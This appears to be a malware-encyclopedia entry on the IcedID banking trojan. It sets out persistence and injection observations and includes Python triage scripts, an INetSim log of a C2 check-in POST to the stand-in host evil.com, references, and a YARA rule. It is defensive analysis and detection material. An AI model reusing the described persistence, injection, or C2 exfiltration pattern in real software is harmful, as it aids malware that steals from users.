win.icedid

IcedID

aka: BokBot, IceID

Actor(s): Lunar Spider


Analysis Observations:

* It sets up persistence by creating a Scheduled Task with the following characteristics:
  * Name: Update
  * Trigger: At log on
  * Action: %LocalAppData%\$Example\waroupada.exe /i
  * Conditions: Stop if the computer ceases to be idle.
* The sub-directory within %LocalAppData% appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.
* The filename remained static during analysis.
* The original malware exe (e.g. waroupada.exe) spawns an instance of svchost.exe as a sub-process and then injects and executes its malicious code within it.
* If "/i" is not passed as an argument, it sets up persistence and waits for reboot.
* If "/i" is passed as an argument (as is the case when the scheduled task is triggered at logon), it skips persistence setup and actually executes, resulting in C2 communication.
* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:
  rundll32.exe kernel32,Sleep -s
* Sets up a local listener to proxy traffic on 127.0.0.1:50000.
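The observations above translate directly into host-side checks: a logon-triggered task whose executable sits one directory below %LocalAppData%, a `rundll32.exe kernel32,Sleep` command line, and a listener on 127.0.0.1:50000. The following is an added example (not code from Malpedia or from any IcedID analysis) that runs those three checks over constructed records; the `ScheduledTask` fields and the process/listener tuple layouts are this example's own choice, modelled on what `schtasks /query /xml`, a process listing and `netstat -ano` would give you.

```python
"""Host-artefact triage for the IcedID persistence and execution behaviour
listed above.  Added example; record layouts and sample data are constructed."""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Indicators taken from the observations above.
TASK_NAME = "update"                 # scheduled task name (compared case-insensitively)
EXECUTE_ONLY_ARG = "/i"              # argument that skips persistence and goes to C2
PROXY_LISTENER = ("127.0.0.1", 50000)

# "rundll32.exe kernel32,Sleep -s": rundll32 invoked with the kernel32 export name.
# Matched case-insensitively, with or without ".exe"/".dll" and a leading path,
# because all of those resolve to the same call on Windows.
RUNDLL32_SLEEP = re.compile(
    r"""(?:^|\\|")rundll32(?:\.exe)?"?\s+kernel32(?:\.dll)?\s*,\s*Sleep\b""",
    re.IGNORECASE,
)


@dataclass
class ScheduledTask:
    name: str
    trigger: str          # "logon", "daily", "boot", ...
    command: str          # action executable, may start with %LocalAppData%
    arguments: str = ""
    stop_if_not_idle: bool = False


def localappdata_depth(command: str, localappdata: str) -> Optional[int]:
    """How many directory levels below %LocalAppData% the executable sits,
    or None when it is not under %LocalAppData% at all.
    'sub\\x.exe' -> 1, 'sub\\deeper\\x.exe' -> 2."""
    expanded = re.sub(r"%localappdata%", lambda _: localappdata, command,
                      flags=re.IGNORECASE)
    full = ntpath.normpath(expanded).lower()
    base = ntpath.normpath(localappdata).lower().rstrip("\\") + "\\"
    if not full.startswith(base):
        return None
    return full[len(base):].count("\\")


def task_findings(task: ScheduledTask, localappdata: str) -> List[str]:
    """Findings for one scheduled task; an empty list means nothing matched.
    depth == 1 encodes the '%LocalAppData%\\<random dir>\\<exe>' layout observed
    above; it is a heuristic, not a family signature."""
    findings: List[str] = []
    if task.trigger.lower() != "logon":
        return findings
    if localappdata_depth(task.command, localappdata) != 1:
        return findings
    findings.append("logon task runs an exe from a first-level %LocalAppData% subdirectory")
    if task.name.lower() == TASK_NAME:
        findings.append("task name 'Update' matches the observed persistence task")
    if task.arguments.strip().lower() == EXECUTE_ONLY_ARG:
        findings.append("'/i' argument matches the observed execute-only mode")
    if task.stop_if_not_idle:
        findings.append("'stop if the computer ceases to be idle' condition matches")
    return findings


def is_rundll32_sleep(cmdline: str) -> bool:
    """True for the rundll32-based Sleep trick observed above."""
    return RUNDLL32_SLEEP.search(cmdline) is not None


def has_proxy_listener(listeners: List[Tuple[str, int, str]]) -> bool:
    """listeners: (local address, local port, state) tuples as from netstat."""
    return any((addr, port) == PROXY_LISTENER and state.upper() == "LISTENING"
               for addr, port, state in listeners)


def triage(tasks, cmdlines, listeners, localappdata) -> List[str]:
    """Run all three checks and return the combined findings."""
    out: List[str] = []
    for t in tasks:
        out += [f"task '{t.name}': {f}" for f in task_findings(t, localappdata)]
    out += [f"process '{c}': rundll32 kernel32,Sleep" for c in cmdlines if is_rundll32_sleep(c)]
    if has_proxy_listener(listeners):
        out.append("listener on 127.0.0.1:50000 matches the observed local proxy")
    return out


# Constructed sample input (not from a real system).
LOCALAPPDATA = r"C:\Users\alice\AppData\Local"
SAMPLE_TASKS = [
    ScheduledTask("Update", "logon", r"%LocalAppData%\Adobe\waroupada.exe", "/i", True),
    ScheduledTask("OneDrive Standalone Update", "logon",
                  r"%LocalAppData%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe"),
    ScheduledTask("Backup", "daily", r"C:\Program Files\Acme\backup.exe"),
]
SAMPLE_CMDLINES = [
    "rundll32.exe kernel32,Sleep -s",
    r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL',
]
SAMPLE_LISTENERS = [("0.0.0.0", 445, "LISTENING"), ("127.0.0.1", 50000, "LISTENING")]

if __name__ == "__main__":
    for line in triage(SAMPLE_TASKS, SAMPLE_CMDLINES, SAMPLE_LISTENERS, LOCALAPPDATA):
        print(line)
```

The depth test deliberately ignores deeper paths such as `%LocalAppData%\Microsoft\OneDrive\...`, which is where legitimate per-user software usually lives; tune that and the task-name check to your environment before treating any single finding as more than a lead.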

Example log from C2 network communication (INetSim):
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2
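The capture above is the kind of INetSim output an analyst gets from a sandbox run, and the check-in request is what one would want to pull out of it automatically. The following is an added example (not code from Malpedia or INetSim) that parses lines of that format, keeps the `info: Request URL:` records, and flags URLs whose query string has the shape of the request above: exactly the keys a, b, d, e, f, g, h, r, i, j, with `b` an 18-hex-digit value. That shape is derived from this single capture only, so it is a triage heuristic, not a verified family signature. `SAMPLE_LOG` is a constructed subset of the capture above plus one benign request.

```python
"""Extract the IcedID C2 check-in from INetSim HTTP log lines (format as in
the capture above).  Added example; sample log is constructed."""
import re
from typing import Dict, Iterable, List, Optional
from urllib.parse import parse_qs, urlsplit

# [timestamp] [pid] [service] [client] kind[: message]
LOG_LINE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<pid>\d+)\] \[(?P<svc>[^\]]+)\] "
    r"\[(?P<client>[^\]]+)\] (?P<kind>\w+)(?:: (?P<msg>.*))?$"
)
REQUEST_URL = re.compile(r"^Request URL: (?P<url>\S+)$")

# Query-string shape of the single check-in observed above (heuristic).
CHECKIN_KEYS = {"a", "b", "d", "e", "f", "g", "h", "r", "i", "j"}
HEX18 = re.compile(r"^[0-9A-Fa-f]{18}$")


def parse_line(line: str) -> Optional[Dict[str, Optional[str]]]:
    """Split one INetSim line into its fields, or None if it is not one."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def refang(url: str) -> str:
    """Turn the analyst's hxxp(s):// defanging back into a parseable scheme."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)


def matches_icedid_checkin(url: str) -> bool:
    """True when the URL has exactly the query keys and 'b' format seen above."""
    parts = urlsplit(refang(url))
    params = parse_qs(parts.query, keep_blank_values=True)
    return (parts.path.endswith(".php")
            and set(params) == CHECKIN_KEYS
            and len(params["b"]) == 1
            and HEX18.match(params["b"][0]) is not None)


def find_checkins(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Walk the log and return the 'info: Request URL:' records that match."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["kind"] != "info":
            continue
        m = REQUEST_URL.match(rec["msg"] or "")
        if m is None or not matches_icedid_checkin(m.group("url")):
            continue
        parts = urlsplit(refang(m.group("url")))
        params = parse_qs(parts.query, keep_blank_values=True)
        hits.append({
            "time": rec["ts"],
            "client": rec["client"],
            "host": parts.hostname,
            "path": parts.path,
            "params": {k: v[0] for k, v in params.items()},
        })
    return hits


# Constructed sample: a subset of the capture above plus one benign request.
SAMPLE_LOG = """\
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 sent=/var/lib/inetsim/http/fakefiles/sample.html
[2018-03-19 12:46:10] [42079] [https_443_tcp 44786] [172.16.0.130:54810] info: Request URL: hxxps://update.example.org/index.php?v=1
"""

if __name__ == "__main__":
    for hit in find_checkins(SAMPLE_LOG.splitlines()):
        print(hit["time"], hit["client"], "->", hit["host"], hit["path"], hit["params"])
```

Only the `info: Request URL:` record is used, so each request is reported once even though the `recv:` and `stat:` lines carry the same URL; the `stat:` line is the better source if you also want the stored POST-data path.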

References
2019-12-18 ⋅ Github (psrok1) ⋅ Paweł Srokosz: IcedID PNG Extractor. https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b [IcedID]
2019-12-03 ⋅ Malwarebytes ⋅ Threat Intelligence Team: New version of IcedID Trojan uses steganographic payloads. https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/ [IcedID]
2019-07-09 ⋅ Fortinet ⋅ Kai Lu: A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection. https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html [IcedID]
2019-06-25 ⋅ Dawid Golak: IcedID aka #Bokbot Analysis with Ghidra. https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766 [IcedID]
2019-06-16 ⋅ Fortinet ⋅ Kai Lu: A Deep Dive Into IcedID Malware: Part II - Analysis of the Core IcedID Payload (Parent Process). https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html [IcedID]
2019-04-04 ⋅ SecurityIntelligence ⋅ Nir Somech, Limor Kessem: IcedID Banking Trojan Spruces Up Injection Tactics to Add Stealth. https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/ [IcedID]
2019-03-21 ⋅ CrowdStrike ⋅ Shaun Hurley, James Scalise: Interception: Dissecting BokBot’s “Man in the Browser”. https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/ [IcedID]
2019-02-15 ⋅ CrowdStrike ⋅ Brendon Feeley, Bex Hartley: “Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web. https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/ [Dyre, IcedID, TrickBot, Vawtrak, Lunar Spider, WIZARD SPIDER]
2019-02-06 ⋅ SecurityIntelligence ⋅ Itzik Chimino, Limor Kessem, Ophir Harpaz: IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites. https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/ [IcedID]
2019-01-03 ⋅ CrowdStrike ⋅ Shaun Hurley, James Scalise: Digging into BokBot’s Core Module. https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/ [IcedID]
2018-11-09 ⋅ Youtube (OALabs) ⋅ Sean Wilson, Sergei Frankoff: Reverse Engineering IcedID / Bokbot Malware Part 2. https://www.youtube.com/watch?v=7Dk7NkIbVqY [IcedID]
2018-10-26 ⋅ Youtube (OALabs) ⋅ Sergei Frankoff: Unpacking Bokbot / IcedID Malware - Part 1. https://www.youtube.com/watch?v=wObF9n2UIAM [IcedID]
2018-09-07 ⋅ Vitali Kremez: Let's Learn: Deeper Dive into "IcedID"/"BokBot" Banking Malware: Part 1. https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html [IcedID]
2018-08-09 ⋅ Fox-IT ⋅ Alfred Klason: Bokbot: The (re)birth of a banker. https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/ [IcedID, Vawtrak]
2018-04-10 ⋅ Cisco Talos ⋅ Ross Gibb, Daphne Galme, Michael Gorelik: IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution. https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html [IcedID]
2017-11-14 ⋅ Digital Guardian ⋅ Chris Brook: IceID Banking Trojan Targeting Banks, Payment Card Providers, E-Commerce Sites. https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites [IcedID]
2017-11-13 ⋅ SecurityIntelligence ⋅ Limor Kessem, Maor Wiesen, Tal Darsan, Tomer Agayev: New Banking Trojan IcedID Discovered by IBM X-Force Research. https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/ [IcedID, IcedID Downloader]
2017-11-13 ⋅ Intezer ⋅ Jay Rosenberg: IcedID Banking Trojan Shares Code with Pony 2.0 Trojan. http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/ [IcedID, IcedID Downloader]
Yara Rules
[TLP:WHITE] win_icedid_auto (20190204 | autogenerated rule brought to you by yara-signator)
rule win_icedid_auto {

    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2019-11-26"
        version = "1"
        description = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator 0.1a"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid"
        malpedia_version = "20190204"
        malpedia_license = "CC BY-NC-SA 4.0"
        malpedia_sharing = "TLP:WHITE"

    /* DISCLAIMER
     * The strings used in this rule have been automatically selected from the
     * disassembly of memory dumps and unpacked files, using yara-signator.
     * The code and documentation / approach will be published in the near future here:
     * https://github.com/fxb-cocacoding/yara-signator
     * As Malpedia is used as data source, please note that for a given
     * number of families, only single samples are documented.
     * This likely impacts the degree of generalization these rules will offer.
     * Take the described generation method also into consideration when you
     * apply the rules in your use cases and assign them confidence levels.
     */

    strings:
        $sequence_0 = { d1c8 f7d0 d1c8 2d20010000 d1c0 f7d0 }
            // n = 6, score = 1200
            //   d1c8                 | ror                 eax, 1
            //   f7d0                 | not                 eax
            //   d1c8                 | ror                 eax, 1
            //   2d20010000           | sub                 eax, 0x120
            //   d1c0                 | rol                 eax, 1
            //   f7d0                 | not                 eax

        $sequence_1 = { 57 6a00 ff15???????? 50 ff15???????? 8bc6 eb02 }
            // n = 7, score = 1100
            //   57                   | push                edi
            //   6a00                 | push                0
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8bc6                 | mov                 eax, esi
            //   eb02                 | jmp                 4

        $sequence_2 = { 8b457c 83e800 7439 83e801 741f }
            // n = 5, score = 1100
            //   8b457c               | mov                 eax, dword ptr [ebp + 0x7c]
            //   83e800               | sub                 eax, 0
            //   7439                 | je                  0x3b
            //   83e801               | sub                 eax, 1
            //   741f                 | je                  0x21

        $sequence_3 = { 50 ff15???????? eb0f 6a08 ff15???????? 50 }
            // n = 6, score = 1100
            //   50                   | push                eax
            //   ff15????????         |                     
            //   eb0f                 | jmp                 0x11
            //   6a08                 | push                8
            //   ff15????????         |                     
            //   50                   | push                eax

        $sequence_4 = { 8bf8 85ff 7418 c60700 47 57 }
            // n = 6, score = 1100
            //   8bf8                 | mov                 edi, eax
            //   85ff                 | test                edi, edi
            //   7418                 | je                  0x1a
            //   c60700               | mov                 byte ptr [edi], 0
            //   47                   | inc                 edi
            //   57                   | push                edi

        $sequence_5 = { ff15???????? 85c0 7511 56 57 }
            // n = 5, score = 1100
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   7511                 | jne                 0x13
            //   56                   | push                esi
            //   57                   | push                edi

        $sequence_6 = { 0fb60d???????? 50 0fb605???????? 50 0fb605???????? 50 }
            // n = 6, score = 1100
            //   0fb60d????????       |                     
            //   50                   | push                eax
            //   0fb605????????       |                     
            //   50                   | push                eax
            //   0fb605????????       |                     
            //   50                   | push                eax

        $sequence_7 = { 5d c3 8b542404 33c9 }
            // n = 4, score = 1000
            //   5d                   | pop                 ebp
            //   c3                   | ret                 
            //   8b542404             | mov                 edx, dword ptr [esp + 4]
            //   33c9                 | xor                 ecx, ecx

        $sequence_8 = { c1c90d 0fbec0 03c8 46 }
            // n = 4, score = 1000
            //   c1c90d               | ror                 ecx, 0xd
            //   0fbec0               | movsx               eax, al
            //   03c8                 | add                 ecx, eax
            //   46                   | inc                 esi

        $sequence_9 = { f7d8 1bc0 f7d0 2345fc 8be5 5d c3 }
            // n = 7, score = 1000
            //   f7d8                 | neg                 eax
            //   1bc0                 | sbb                 eax, eax
            //   f7d0                 | not                 eax
            //   2345fc               | and                 eax, dword ptr [ebp - 4]
            //   8be5                 | mov                 esp, ebp
            //   5d                   | pop                 ebp
            //   c3                   | ret                 

        $sequence_10 = { 59 59 c3 33c0 ebf5 55 }
            // n = 6, score = 900
            //   59                   | pop                 ecx
            //   59                   | pop                 ecx
            //   c3                   | ret                 
            //   33c0                 | xor                 eax, eax
            //   ebf5                 | jmp                 0xfffffff7
            //   55                   | push                ebp

        $sequence_11 = { 8bf0 8d45fc 50 ff75fc 6a05 }
            // n = 5, score = 900
            //   8bf0                 | mov                 esi, eax
            //   8d45fc               | lea                 eax, [ebp - 4]
            //   50                   | push                eax
            //   ff75fc               | push                dword ptr [ebp - 4]
            //   6a05                 | push                5

        $sequence_12 = { 8d5004 89542414 8b12 85d2 7454 8d6af8 d1ed }
            // n = 7, score = 700
            //   8d5004               | lea                 edx, [eax + 4]
            //   89542414             | mov                 dword ptr [esp + 0x14], edx
            //   8b12                 | mov                 edx, dword ptr [edx]
            //   85d2                 | test                edx, edx
            //   7454                 | je                  0x56
            //   8d6af8               | lea                 ebp, [edx - 8]
            //   d1ed                 | shr                 ebp, 1

        $sequence_13 = { 0fb6440b34 50 ff740b28 8b440b24 }
            // n = 4, score = 700
            //   0fb6440b34           | movzx               eax, byte ptr [ebx + ecx + 0x34]
            //   50                   | push                eax
            //   ff740b28             | push                dword ptr [ebx + ecx + 0x28]
            //   8b440b24             | mov                 eax, dword ptr [ebx + ecx + 0x24]

        $sequence_14 = { 8a4173 a808 75f5 a804 }
            // n = 4, score = 400
            //   8a4173               | mov                 al, byte ptr [ecx + 0x73]
            //   a808                 | test                al, 8
            //   75f5                 | jne                 0xfffffff7
            //   a804                 | test                al, 4

        $sequence_15 = { ff15???????? 85c0 750a b8010000c0 e9???????? }
            // n = 5, score = 400
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   750a                 | jne                 0xc
            //   b8010000c0           | mov                 eax, 0xc0000001
            //   e9????????           |                     

        $sequence_16 = { ff5010 85c0 7407 33c0 e9???????? }
            // n = 5, score = 400
            //   ff5010               | call                dword ptr [eax + 0x10]
            //   85c0                 | test                eax, eax
            //   7407                 | je                  9
            //   33c0                 | xor                 eax, eax
            //   e9????????           |                     

        $sequence_17 = { 48 8d542420 41 b804010000 33c9 8bde ff15???????? }
            // n = 7, score = 200
            //   48                   | dec                 eax
            //   8d542420             | lea                 edx, [esp + 0x20]
            //   41                   | inc                 ecx
            //   b804010000           | mov                 eax, 0x104
            //   33c9                 | xor                 ecx, ecx
            //   8bde                 | mov                 ebx, esi
            //   ff15????????         |                     

        $sequence_18 = { 57 41 56 48 83ec20 0fb7f1 }
            // n = 6, score = 200
            //   57                   | push                edi
            //   41                   | inc                 ecx
            //   56                   | push                esi
            //   48                   | dec                 eax
            //   83ec20               | sub                 esp, 0x20
            //   0fb7f1               | movzx               esi, cx

        $sequence_19 = { 8b4810 4a 8b04c1 44 3b480c 72c1 48 }
            // n = 7, score = 200
            //   8b4810               | mov                 ecx, dword ptr [eax + 0x10]
            //   4a                   | dec                 edx
            //   8b04c1               | mov                 eax, dword ptr [ecx + eax*8]
            //   44                   | inc                 esp
            //   3b480c               | cmp                 ecx, dword ptr [eax + 0xc]
            //   72c1                 | jb                  0xffffffc3
            //   48                   | dec                 eax

        $sequence_20 = { 0fb65309 48 035301 48 89573a 48 8d542430 }
            // n = 7, score = 200
            //   0fb65309             | movzx               edx, byte ptr [ebx + 9]
            //   48                   | dec                 eax
            //   035301               | add                 edx, dword ptr [ebx + 1]
            //   48                   | dec                 eax
            //   89573a               | mov                 dword ptr [edi + 0x3a], edx
            //   48                   | dec                 eax
            //   8d542430             | lea                 edx, [esp + 0x30]

        $sequence_21 = { 48 8d510a 48 8b4c0b01 48 }
            // n = 5, score = 200
            //   48                   | dec                 eax
            //   8d510a               | lea                 edx, [ecx + 0xa]
            //   48                   | dec                 eax
            //   8b4c0b01             | mov                 ecx, dword ptr [ebx + ecx + 1]
            //   48                   | dec                 eax

    condition:
        7 of them
}